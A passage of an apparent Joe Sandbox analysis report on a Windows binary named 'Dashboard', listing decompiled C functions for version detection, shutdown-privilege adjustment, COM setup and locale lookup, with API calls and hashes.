                                                                                                                      • Part of subcall function 010090EF: TraceMessage.ADVAPI32(?,?,0000002B,00000000,00000000,010017F8,00000004,00000000,?,0100795C,6C744143,65637845,00000011,010017F8,00000000,00000000), ref: 0100910A
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01007906
                                                                                                                    • UXCoreUnInitThread.UXCORE ref: 0100790C
                                                                                                                    • UXCoreUnInitProcess.UXCORE(00000000), ref: 01007936
                                                                                                                    • ?RMTerminate@@YGXXZ.UXCORE(00000000), ref: 01007960
                                                                                                                    • CoUninitialize.OLE32 ref: 01007966
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0100797F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$CoreHeapInitProcess$K00@ResourceSet@@Update$CloseErrorH_prolog3HandleInformationLastThreadTrace$CreateDispatchInitializeInitialize@@MutexTerminate@@TranslateUninitialize
                                                                                                                    • String ID: 1.0.0.1$DashboardLoc$DashboardRes$WLXS\Dashboard
                                                                                                                    • API String ID: 2320391741-3161801426
                                                                                                                    • Opcode ID: b0b7640e0d6759bdf3b6e056b6aff3e48fdc5acccfe6a9e4f297daa83d35a3af
                                                                                                                    • Instruction ID: 08b694855b39e6496e6f59cceddca6a9dea7f06b922978450260764b005a29ed
                                                                                                                    • Opcode Fuzzy Hash: b0b7640e0d6759bdf3b6e056b6aff3e48fdc5acccfe6a9e4f297daa83d35a3af
                                                                                                                    • Instruction Fuzzy Hash: 6091D470500249BBFB17AFA4CD44FAE7BA9EF44744F144499F6C1960D2C77ADA41CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E0100737C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t37;
                                                                                                                    				char* _t43;
                                                                                                                    				void* _t52;
                                                                                                                    				void* _t59;
                                                                                                                    
                                                                                                                    				_t52 = __edx;
                                                                                                                    				_t44 = __ebx;
                                                                                                                    				_push(0x124);
                                                                                                                    				E01008882(E01015BF5, __ebx, __edi, __esi);
                                                                                                                    				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                                                                                                                    				_t54 =  *((intOrPtr*)(_t59 + 8));
                                                                                                                    				 *(_t59 - 0x12c) =  *(_t59 - 0x12c) & 0x00000000;
                                                                                                                    				 *((intOrPtr*)(_t59 - 0x130)) =  *((intOrPtr*)(_t59 + 8));
                                                                                                                    				 *(_t59 - 0x124) = 0x114;
                                                                                                                    				E01004D33(_t59 - 0x128, 0x101a5f0);
                                                                                                                    				 *(_t59 - 4) = 1;
                                                                                                                    				if(GetVersionExW(_t59 - 0x124) == 0) {
                                                                                                                    					L15:
                                                                                                                    					_push(L"Indefinite");
                                                                                                                    					L16:
                                                                                                                    					E0100628E(_t59 - 0x128, _t54);
                                                                                                                    					L17:
                                                                                                                    					E01005BFD(_t54);
                                                                                                                    					 *(_t59 - 0x12c) = 1;
                                                                                                                    					_t58 =  *((intOrPtr*)(_t59 - 0x128));
                                                                                                                    					E0100720B(_t54, L"Version: %s",  *((intOrPtr*)(_t59 - 0x128)));
                                                                                                                    					E01004925(_t58 - 0x10, _t52);
                                                                                                                    					return E01008914(_t44, _t54, _t58);
                                                                                                                    				}
                                                                                                                    				if( *((intOrPtr*)(_t59 - 0x114)) <= 1) {
                                                                                                                    					_push(L"Unsupported");
                                                                                                                    					goto L16;
                                                                                                                    				}
                                                                                                                    				if( *((intOrPtr*)(_t59 - 0x114)) != 2) {
                                                                                                                    					goto L15;
                                                                                                                    				}
                                                                                                                    				_t37 =  *((intOrPtr*)(_t59 - 0x120)) - 5;
                                                                                                                    				if(_t37 == 0) {
                                                                                                                    					if( *((intOrPtr*)(_t59 - 0x11c)) != 1) {
                                                                                                                    						_push(L"Windows 2003");
                                                                                                                    					} else {
                                                                                                                    						_push(L"Windows XP");
                                                                                                                    					}
                                                                                                                    					L12:
                                                                                                                    					E0100628E(_t59 - 0x128, _t54);
                                                                                                                    					if( *((short*)(_t59 - 0x110)) != 0) {
                                                                                                                    						E010071E5(_t59 - 0x128, " ");
                                                                                                                    						E010071E5(_t59 - 0x128, _t59 - 0x110);
                                                                                                                    					}
                                                                                                                    					goto L17;
                                                                                                                    				}
                                                                                                                    				if(_t37 == 1) {
                                                                                                                    					_push(L"Windows Vista");
                                                                                                                    					goto L12;
                                                                                                                    				}
                                                                                                                    				_t43 = L"New";
                                                                                                                    				if( *((intOrPtr*)(_t59 - 0x120)) <= 6) {
                                                                                                                    					_t43 = L"Unsupported";
                                                                                                                    				}
                                                                                                                    				_push(_t43);
                                                                                                                    				goto L12;
                                                                                                                    			}







                                                                                                                    0x0100737c
                                                                                                                    0x0100737c
                                                                                                                    0x0100737c
                                                                                                                    0x01007386
                                                                                                                    0x0100738b
                                                                                                                    0x0100738f
                                                                                                                    0x01007392
                                                                                                                    0x010073a4
                                                                                                                    0x010073aa
                                                                                                                    0x010073b4
                                                                                                                    0x010073c3
                                                                                                                    0x010073ce
                                                                                                                    0x01007468
                                                                                                                    0x01007468
                                                                                                                    0x0100746d
                                                                                                                    0x01007473
                                                                                                                    0x01007478
                                                                                                                    0x0100747a
                                                                                                                    0x0100747f
                                                                                                                    0x01007485
                                                                                                                    0x01007492
                                                                                                                    0x0100749d
                                                                                                                    0x010074a9
                                                                                                                    0x010074a9
                                                                                                                    0x010073da
                                                                                                                    0x01007461
                                                                                                                    0x00000000
                                                                                                                    0x01007461
                                                                                                                    0x010073e7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010073ef
                                                                                                                    0x010073f2
                                                                                                                    0x0100741a
                                                                                                                    0x01007423
                                                                                                                    0x0100741c
                                                                                                                    0x0100741c
                                                                                                                    0x0100741c
                                                                                                                    0x01007428
                                                                                                                    0x0100742e
                                                                                                                    0x0100743b
                                                                                                                    0x01007448
                                                                                                                    0x0100745a
                                                                                                                    0x0100745a
                                                                                                                    0x00000000
                                                                                                                    0x0100743b
                                                                                                                    0x010073f5
                                                                                                                    0x0100740d
                                                                                                                    0x00000000
                                                                                                                    0x0100740d
                                                                                                                    0x010073fe
                                                                                                                    0x01007403
                                                                                                                    0x01007405
                                                                                                                    0x01007405
                                                                                                                    0x0100740a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 01007386
                                                                                                                    • GetVersionExW.KERNEL32(00000114), ref: 010073C6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3_Version
                                                                                                                    • String ID: Indefinite$New$Unsupported$Version: %s$Windows 2003$Windows Vista$Windows XP
                                                                                                                    • API String ID: 3152847492-2193866653
                                                                                                                    • Opcode ID: 2a15ceeba3357e99c7376be5592d206867398d81c9a1a4da5e0b88e1e5aa7b36
                                                                                                                    • Instruction ID: 8d59f35c0632d355e65b9679e5f98fc215be8b449174d6887c6459e1db327f46
                                                                                                                    • Opcode Fuzzy Hash: 2a15ceeba3357e99c7376be5592d206867398d81c9a1a4da5e0b88e1e5aa7b36
                                                                                                                    • Instruction Fuzzy Hash: 642191309002299BFB77EB14CC017ECBAB4AB29711F0140D9E1C5661C0CF786BA5CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0100CC59() {
                                                                                                                    				void* _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                    				int _t18;
                                                                                                                    
                                                                                                                    				_t18 = 0;
                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0) {
                                                                                                                    					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                    					_v24.PrivilegeCount = 1;
                                                                                                                    					_v12 = 2;
                                                                                                                    					AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                    					if(GetLastError() == 0) {
                                                                                                                    						_t18 = 1;
                                                                                                                    					}
                                                                                                                    					CloseHandle(_v8);
                                                                                                                    				}
                                                                                                                    				return _t18;
                                                                                                                    			}







                                                                                                                    0x0100cc68
                                                                                                                    0x0100cc79
                                                                                                                    0x0100cc85
                                                                                                                    0x0100cc96
                                                                                                                    0x0100cc9d
                                                                                                                    0x0100cca4
                                                                                                                    0x0100ccb2
                                                                                                                    0x0100ccb4
                                                                                                                    0x0100ccb4
                                                                                                                    0x0100ccb8
                                                                                                                    0x0100ccb8
                                                                                                                    0x0100ccc2

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0100CC6A
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0100CC71
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0100CC85
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0100CCA4
                                                                                                                    • GetLastError.KERNEL32 ref: 0100CCAA
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0100CCB8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 3398352648-3733053543
                                                                                                                    • Opcode ID: ee0013f882b80b2b7a19fe59f5a101aa25fab3b9e718203e879d761d41fc8881
                                                                                                                    • Instruction ID: 302b449996c1f7a5efa8ccff5f194c8d7dcba89ad3a7b713aaf80952cba0cb84
                                                                                                                    • Opcode Fuzzy Hash: ee0013f882b80b2b7a19fe59f5a101aa25fab3b9e718203e879d761d41fc8881
                                                                                                                    • Instruction Fuzzy Hash: 33F01971601168ABEB22EBA1DD0DEEF7E7CEF41750F100055F986E1145DBB9CA04DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E010087FB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                    				intOrPtr _v0;
                                                                                                                    				void* _v804;
                                                                                                                    				intOrPtr _v808;
                                                                                                                    				intOrPtr _v812;
                                                                                                                    				intOrPtr _t6;
                                                                                                                    				intOrPtr _t11;
                                                                                                                    				intOrPtr _t12;
                                                                                                                    				intOrPtr _t13;
                                                                                                                    				intOrPtr _t19;
                                                                                                                    				intOrPtr _t20;
                                                                                                                    				intOrPtr _t23;
                                                                                                                    				intOrPtr _t24;
                                                                                                                    				intOrPtr _t25;
                                                                                                                    				intOrPtr* _t29;
                                                                                                                    				void* _t32;
                                                                                                                    
                                                                                                                    				_t25 = __esi;
                                                                                                                    				_t24 = __edi;
                                                                                                                    				_t23 = __edx;
                                                                                                                    				_t20 = __ecx;
                                                                                                                    				_t19 = __ebx;
                                                                                                                    				_t6 = __eax;
                                                                                                                    				_t32 = _t20 -  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				if(_t32 == 0) {
                                                                                                                    					asm("repe ret");
                                                                                                                    				}
                                                                                                                    				 *0x101a748 = _t6;
                                                                                                                    				 *0x101a744 = _t20;
                                                                                                                    				 *0x101a740 = _t23;
                                                                                                                    				 *0x101a73c = _t19;
                                                                                                                    				 *0x101a738 = _t25;
                                                                                                                    				 *0x101a734 = _t24;
                                                                                                                    				 *0x101a760 = ss;
                                                                                                                    				 *0x101a754 = cs;
                                                                                                                    				 *0x101a730 = ds;
                                                                                                                    				 *0x101a72c = es;
                                                                                                                    				 *0x101a728 = fs;
                                                                                                                    				 *0x101a724 = gs;
                                                                                                                    				asm("pushfd");
                                                                                                                    				_pop( *0x101a758);
                                                                                                                    				 *0x101a74c =  *_t29;
                                                                                                                    				 *0x101a750 = _v0;
                                                                                                                    				 *0x101a75c =  &_a4;
                                                                                                                    				 *0x101a698 = 0x10001;
                                                                                                                    				_t11 =  *0x101a750; // 0x0
                                                                                                                    				 *0x101a64c = _t11;
                                                                                                                    				 *0x101a640 = 0xc0000409;
                                                                                                                    				 *0x101a644 = 1;
                                                                                                                    				_t12 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v812 = _t12;
                                                                                                                    				_t13 =  *0x101a2b8; // 0x44bf19b1
                                                                                                                    				_v808 = _t13;
                                                                                                                    				 *0x101a690 = IsDebuggerPresent();
                                                                                                                    				_push(1);
                                                                                                                    				L01008DC6();
                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                    				UnhandledExceptionFilter(0x1001ce4);
                                                                                                                    				if( *0x101a690 == 0) {
                                                                                                                    					_push(1);
                                                                                                                    					L01008DC6();
                                                                                                                    				}
                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                    			}


















                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x010087fb
                                                                                                                    0x01008801
                                                                                                                    0x01008803
                                                                                                                    0x01008803
                                                                                                                    0x01008c7e
                                                                                                                    0x01008c83
                                                                                                                    0x01008c89
                                                                                                                    0x01008c8f
                                                                                                                    0x01008c95
                                                                                                                    0x01008c9b
                                                                                                                    0x01008ca1
                                                                                                                    0x01008ca8
                                                                                                                    0x01008caf
                                                                                                                    0x01008cb6
                                                                                                                    0x01008cbd
                                                                                                                    0x01008cc4
                                                                                                                    0x01008ccb
                                                                                                                    0x01008ccc
                                                                                                                    0x01008cd5
                                                                                                                    0x01008cdd
                                                                                                                    0x01008ce5
                                                                                                                    0x01008cf0
                                                                                                                    0x01008cfa
                                                                                                                    0x01008cff
                                                                                                                    0x01008d04
                                                                                                                    0x01008d0e
                                                                                                                    0x01008d18
                                                                                                                    0x01008d1d
                                                                                                                    0x01008d23
                                                                                                                    0x01008d28
                                                                                                                    0x01008d34
                                                                                                                    0x01008d39
                                                                                                                    0x01008d3b
                                                                                                                    0x01008d43
                                                                                                                    0x01008d4e
                                                                                                                    0x01008d5b
                                                                                                                    0x01008d5d
                                                                                                                    0x01008d5f
                                                                                                                    0x01008d64
                                                                                                                    0x01008d78

                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 01008D2E
                                                                                                                    • _crt_debugger_hook.MSVCR80(00000001), ref: 01008D3B
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01008D43
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(01001CE4), ref: 01008D4E
                                                                                                                    • _crt_debugger_hook.MSVCR80(00000001), ref: 01008D5F
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 01008D6A
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 01008D71
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3369434319-0
                                                                                                                    • Opcode ID: 7d6ce6bd35bee8a7f2e6959517e5b17b2968080e00cf88af5c1365b4dfdd6eff
                                                                                                                    • Instruction ID: a0f8ed9874d63253848e0c0cdeecc4be2fe3a16b8920436d4c56b97c05f8a7d2
                                                                                                                    • Opcode Fuzzy Hash: 7d6ce6bd35bee8a7f2e6959517e5b17b2968080e00cf88af5c1365b4dfdd6eff
                                                                                                                    • Instruction Fuzzy Hash: B521CBB4A02284DFDB32DF28E9896943BB0FB18310F01551AE48A83249E3BE96858F15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E010095A3(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr _t43;
                                                                                                                    				intOrPtr _t45;
                                                                                                                    				intOrPtr _t46;
                                                                                                                    				WCHAR* _t56;
                                                                                                                    				intOrPtr _t57;
                                                                                                                    				void* _t60;
                                                                                                                    				intOrPtr _t65;
                                                                                                                    				intOrPtr* _t66;
                                                                                                                    				intOrPtr* _t67;
                                                                                                                    				void* _t70;
                                                                                                                    
                                                                                                                    				_push(0xc);
                                                                                                                    				E0100880F(E01015C98, __ebx, __edi, __esi);
                                                                                                                    				_t65 = __ecx;
                                                                                                                    				 *((intOrPtr*)(_t70 - 0x18)) = __ecx;
                                                                                                                    				_t43 =  *0x101a004; // 0x101a004
                                                                                                                    				_t60 = 0x1001e2c;
                                                                                                                    				if(_t43 != 0x101a004 && ( *(_t43 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t5 = _t43 + 0x14; // 0x65637845
                                                                                                                    					_t6 = _t43 + 0x10; // 0x6c744143
                                                                                                                    					E010049DE(_t43,  *_t6,  *_t5, 0x4a, 0x1001e2c);
                                                                                                                    				}
                                                                                                                    				E01009528(_t70 - 0x14,  *0x101a484);
                                                                                                                    				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
                                                                                                                    				_t45 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t45 != 0x101a004 && ( *(_t45 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t56 = GetCommandLineW();
                                                                                                                    					_t57 =  *0x101a004; // 0x101a004
                                                                                                                    					_t13 = _t57 + 0x14; // 0x65637845
                                                                                                                    					_t14 = _t57 + 0x10; // 0x6c744143
                                                                                                                    					_t45 = E01006C01( *_t14,  *_t13, 0x4b, _t60, _t56);
                                                                                                                    				}
                                                                                                                    				_t66 = _t65 + 0xc4;
                                                                                                                    				__imp__CoCreateInstance(0x1001ddc, 0, 0x17, 0x1001e3c, _t66);
                                                                                                                    				 *((intOrPtr*)(_t70 - 0x10)) = _t45;
                                                                                                                    				_t46 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t46 != 0x101a004 && ( *(_t46 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t20 = _t46 + 0x14; // 0x65637845
                                                                                                                    					_t21 = _t46 + 0x10; // 0x6c744143
                                                                                                                    					E010090EF( *_t21,  *_t20, 0x4c, _t60,  *((intOrPtr*)(_t70 - 0x10)));
                                                                                                                    					_t46 =  *0x101a004; // 0x101a004
                                                                                                                    				}
                                                                                                                    				if( *((intOrPtr*)(_t70 - 0x10)) < 0) {
                                                                                                                    					L13:
                                                                                                                    					if(_t46 != 0x101a004 && ( *(_t46 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    						_t37 = _t46 + 0x14; // 0x65637845
                                                                                                                    						_t38 = _t46 + 0x10; // 0x6c744143
                                                                                                                    						E010090EF( *_t38,  *_t37, 0x4e, _t60,  *((intOrPtr*)(_t70 - 0x10)));
                                                                                                                    					}
                                                                                                                    					goto L16;
                                                                                                                    				} else {
                                                                                                                    					_t67 =  *_t66;
                                                                                                                    					 *((intOrPtr*)(_t70 - 0x10)) =  *((intOrPtr*)( *_t67 + 0x28))(_t67, GetCurrentProcessId(),  *((intOrPtr*)(_t70 - 0x14)),  *((intOrPtr*)(_t70 - 0x18)) + 0xc8);
                                                                                                                    					_t46 =  *0x101a004; // 0x101a004
                                                                                                                    					if(_t46 == 0x101a004) {
                                                                                                                    						L16:
                                                                                                                    						__imp__#6( *((intOrPtr*)(_t70 - 0x14)));
                                                                                                                    						return E010088FB( *((intOrPtr*)(_t70 - 0x10)));
                                                                                                                    					}
                                                                                                                    					_t60 = 0x1001e2c;
                                                                                                                    					if(( *(_t46 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    						_t31 = _t46 + 0x14; // 0x65637845
                                                                                                                    						_t32 = _t46 + 0x10; // 0x6c744143
                                                                                                                    						E010090EF( *_t32,  *_t31, 0x4d, 0x1001e2c,  *((intOrPtr*)(_t70 - 0x10)));
                                                                                                                    						_t46 =  *0x101a004; // 0x101a004
                                                                                                                    					}
                                                                                                                    					goto L13;
                                                                                                                    				}
                                                                                                                    			}













                                                                                                                    0x010095a3
                                                                                                                    0x010095aa
                                                                                                                    0x010095af
                                                                                                                    0x010095b1
                                                                                                                    0x010095b4
                                                                                                                    0x010095c0
                                                                                                                    0x010095c5
                                                                                                                    0x010095d0
                                                                                                                    0x010095d3
                                                                                                                    0x010095d6
                                                                                                                    0x010095d6
                                                                                                                    0x010095e4
                                                                                                                    0x010095e9
                                                                                                                    0x010095ed
                                                                                                                    0x010095f4
                                                                                                                    0x010095fc
                                                                                                                    0x01009603
                                                                                                                    0x0100960b
                                                                                                                    0x0100960e
                                                                                                                    0x01009611
                                                                                                                    0x01009611
                                                                                                                    0x01009616
                                                                                                                    0x0100962b
                                                                                                                    0x01009631
                                                                                                                    0x01009634
                                                                                                                    0x0100963b
                                                                                                                    0x01009649
                                                                                                                    0x0100964c
                                                                                                                    0x0100964f
                                                                                                                    0x01009654
                                                                                                                    0x01009654
                                                                                                                    0x0100965d
                                                                                                                    0x010096a7
                                                                                                                    0x010096a9
                                                                                                                    0x010096b7
                                                                                                                    0x010096ba
                                                                                                                    0x010096bd
                                                                                                                    0x010096bd
                                                                                                                    0x00000000
                                                                                                                    0x0100965f
                                                                                                                    0x01009662
                                                                                                                    0x0100967a
                                                                                                                    0x0100967d
                                                                                                                    0x01009684
                                                                                                                    0x010096c2
                                                                                                                    0x010096c5
                                                                                                                    0x010096d3
                                                                                                                    0x010096d3
                                                                                                                    0x0100968a
                                                                                                                    0x0100968f
                                                                                                                    0x01009697
                                                                                                                    0x0100969a
                                                                                                                    0x0100969d
                                                                                                                    0x010096a2
                                                                                                                    0x010096a2
                                                                                                                    0x00000000
                                                                                                                    0x0100968f

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 010095AA
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 010095FC
                                                                                                                    • CoCreateInstance.OLE32(01001DDC,00000000,00000017,01001E3C), ref: 0100962B
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?), ref: 0100966F
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 010096C5
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CommandCreateCurrentFreeH_prolog3InstanceLineMessageProcessStringTrace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 631387903-0
                                                                                                                    • Opcode ID: dd798d488336b5684a717e138d2c436395bdac2780f2e75ecb861d8dbafbc93f
                                                                                                                    • Instruction ID: 44c6bbda73d8c30009d73df1ae5140f96420e134551cff5f5282a8c3a6a66a6a
                                                                                                                    • Opcode Fuzzy Hash: dd798d488336b5684a717e138d2c436395bdac2780f2e75ecb861d8dbafbc93f
                                                                                                                    • Instruction Fuzzy Hash: 99314770600245EFFB679B58DE44F6A7BA6BB08308F060484F784AB1E6C77AC910CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0100821F() {
                                                                                                                    				signed int _v8;
                                                                                                                    				char _v16;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t8;
                                                                                                                    				intOrPtr* _t15;
                                                                                                                    				intOrPtr _t16;
                                                                                                                    				char _t20;
                                                                                                                    				intOrPtr _t22;
                                                                                                                    				intOrPtr _t23;
                                                                                                                    				signed int _t24;
                                                                                                                    				int _t25;
                                                                                                                    				signed int _t27;
                                                                                                                    
                                                                                                                    				_t8 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t8 ^ _t27;
                                                                                                                    				_t24 = 0;
                                                                                                                    				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                                                    					L4:
                                                                                                                    					_t25 = GetACP();
                                                                                                                    				} else {
                                                                                                                    					_t20 = _v16;
                                                                                                                    					_t15 =  &_v16;
                                                                                                                    					if(_t20 == 0) {
                                                                                                                    						goto L4;
                                                                                                                    					} else {
                                                                                                                    						do {
                                                                                                                    							_t15 = _t15 + 1;
                                                                                                                    							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                                                    							_t20 =  *_t15;
                                                                                                                    						} while (_t20 != 0);
                                                                                                                    						if(_t24 == 0) {
                                                                                                                    							goto L4;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010087FB(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                                    			}















                                                                                                                    0x01008225
                                                                                                                    0x0100822c
                                                                                                                    0x01008230
                                                                                                                    0x0100824c
                                                                                                                    0x0100826d
                                                                                                                    0x01008273
                                                                                                                    0x0100824e
                                                                                                                    0x0100824e
                                                                                                                    0x01008253
                                                                                                                    0x01008256
                                                                                                                    0x00000000
                                                                                                                    0x01008258
                                                                                                                    0x01008258
                                                                                                                    0x0100825e
                                                                                                                    0x0100825f
                                                                                                                    0x01008263
                                                                                                                    0x01008265
                                                                                                                    0x0100826b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100826b
                                                                                                                    0x01008256
                                                                                                                    0x01008283

                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32 ref: 01008232
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 01008244
                                                                                                                    • GetACP.KERNEL32 ref: 0100826D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4232894706-0
                                                                                                                    • Opcode ID: 70f33ab9d729608102f05b2e7a97b5d5e3e1e5541cdeeb8c49c9180d0241caed
